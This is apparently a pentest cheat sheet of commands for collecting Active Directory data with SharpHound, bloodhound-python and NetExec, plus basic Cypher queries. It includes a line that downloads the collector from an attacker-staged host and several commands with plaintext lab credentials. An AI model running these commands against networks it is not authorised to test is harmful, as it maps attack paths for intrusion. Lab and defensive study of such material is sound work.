>_ shadow.red

SharpHound - Data Collection

Active Directory AD Enumeration windows linux

From PowerShell

. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\L.Livingstone\Documents\ -OutputPrefix "corp audit"

EXE variant

.\SharpHound.exe --CollectionMethods All --Domain resourced.local --ExcludeDCs --OutputPrefix "Dork"

Copy SharpHound from Kali

cp /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 .
cp /usr/share/metasploit-framework/data/post/powershell/SharpHound.ps1 SH.ps1
iwr -uri http://192.168.119.5:8000/SharpHound.ps1 -Outfile SharpHound.ps1

Remote collection from Kali (no need to drop binaries)

bloodhound-python -u "hrapp-service" -p 'Untimed$Runny' -d hokkaido-aerospace.com -c all --zip -ns 192.168.208.40
bloodhound-python -u enox -p california -ns 192.168.81.165 -d heist.offsec -c all

Ingest with NetExec

netexec ldap $target -u SQLService -p 'MYpassword123#' --bloodhound --collection All --dns-server $target

Useful raw cypher queries

MATCH (m:Computer) RETURN m
MATCH (m:User) RETURN m
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p

Pre-built useful queries